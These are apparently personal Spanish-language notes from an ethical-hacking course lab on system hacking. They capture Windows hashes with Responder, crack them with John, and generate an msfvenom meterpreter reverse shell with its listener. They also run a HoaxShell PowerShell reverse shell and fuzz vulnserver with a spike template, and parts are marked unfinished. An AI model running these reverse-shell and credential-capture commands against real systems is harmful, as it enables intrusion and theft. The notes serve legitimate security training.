Lab Module 06: Sytem hacking

  1. sudo responder -I eth0 → capturar hash máquina W11 en txt → hash.txt
  2. john hash.txt → desencripta la contraseña del hash

cmd

  • docker run -d -p 80:80 reverse_shell_generator
    • IP, Port, MSFVenom → genera instrucción: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe
    • se genera un EXE - payload (que hemos de conseguir que ejecute la víctima)
    • generamos la instrucción para escuchar el payload, en la sección LISTENER, modo msfconsole
      • msfconsole -q -x «use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit»
    • ejecutamos el listener, ejecutamos el payload
      • getuid

powershell

    • HoaxShell → PowerShell IEX → cambiar puerto en el script generado por 444
    • copiar y guardar en shell.ps1
    • ir a la sección listener y generar para HoaxShell (puerto 444)
    • ejecutar instrucción generada con sudo: sudo python…
    • ejecutamos en un powershell subido a Administrador el script .ps1
  • ejecutar como administrador vulnserver (buffer overflow tools)
  • instalar ImmunityDebugger_1_85_setup.exe (y Python 2.7)
  • ejecutar como administrador
    • File → Attach → vulnserver ← pausado
    • Icono PLAY
  • en Linux, ejecutamos nc -nv 10.10.1.11 9999
    • HELP nos lista los comandos disponibles
    • QUIT para salir
    • creamos un «spike template» → pluma stats.spk:
      s_readline();
      
      s_string(“STATS ”);
      
      s_string_variable(“0”);
    • generic_send_tcp 10.10.1.11 9999 stats.spk 0 0
      • los dos últimos ceros son SKIPVAR y SKIPSTR
    • ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable
    • Se hace lo mismo cambiando STAT por TRUN
    • PENDIENTE
  • PENDIENTE

Task 4: Perform Post-Enumeration using PowerView

  • info/cursos/pue/ethical-hacker/sesion2/lab6.txt
  • Darrera modificació: 20/02/2025 23:50
  • per mate